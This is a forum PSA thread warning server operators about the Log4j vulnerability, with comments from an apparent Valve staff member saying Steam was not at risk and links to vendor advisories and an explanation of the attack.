[PSA]"Recently uncovered software flaw ‘most critical vulnerability of the last decade’"

Yeah this is a big deal. And whilst the big guys will patch it out almost immediately, or stop using the logging program, you just know there will be hundreds of thousands of small companies and individuals affected by this. As the server guy for my company, I was informed about it and checked it out straight away, luckily the only plugin that we have which might have been affected is uninstalled on our servers. But it's going to catch a lot of people out. Anyone who runs a server needs to see this and check if anything they have installed is using log4j.

Yes this is bad, regarding steam they already acted to prevent damage

Comment by JonP_valve:

We immediately reviewed our services that use log4j and verified that our network security rules blocked downloading and executing untrusted code. We do not believe there are any risks to Steam associated with this vulnerability.

Comment by JonP_valve:

The early discussion on twitter mentioned Steam specifically but they were talking strictly about the server side - not the Steam client. It appears they were using "a DNS lookup occurred" as enough to indicate a potentially-vulnerable system. However we were able to                                                           confirm that Steam servers were not at risk of running untrusted external code via this log4j issue.

If anybody needs extra info, list of security advisories per company (not mine, just spreading info):

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

Actual explanation of the attack:

https://www.lunasec.io/docs/blog/log4j-zero-day/